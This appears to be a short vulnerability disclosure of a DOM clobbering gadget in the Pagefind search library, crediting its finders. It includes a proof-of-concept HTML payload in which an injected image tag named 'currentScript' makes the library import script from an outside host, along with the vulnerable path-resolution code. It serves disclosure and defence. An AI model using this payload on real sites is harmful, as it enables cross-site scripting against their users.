Pagefind is a fully static search library that aims to perform well on large sites, while using as little of your users’ bandwidth as possible, and without hosting any infrastructure.
The pagefind library was loading modules using as a base the document.currentScript.src value on this regex match(/^(.*\/)(?:pagefind-)?ui.js.*$/)[1].
<div id="search"></div>
<script nonce="secret" type="module">
import * as pagefinddefaultUi from 'https://cdn.jsdelivr.net/npm/@pagefind/[email protected]/+esm';
new pagefinddefaultUi.PagefindUI({ element: "#search", showSubResults: true });
const inputElement = document.querySelector('.pagefind-ui__search-input.svelte-e9gkc3');
if (inputElement) {
inputElement.value = 'Your text here';
inputElement.dispatchEvent(new Event('input'));
}
</script>
<!-- user input -->
<img name="currentScript" src="blob:https://gmsgadget.com/assets/xss/ui.js">Root Cause
let scriptBundlePath;
try {
scriptBundlePath = new URL(document.currentScript.src).pathname.match(
/^(.*\/)(?:pagefind-)?ui.js.*$/
)[1];
} catch (e) {
scriptBundlePath = "/pagefind/";
}
imported_pagefind = await import(`${base_path}pagefind.js`);
Related links:
Found by jackfromeast, ishmeals.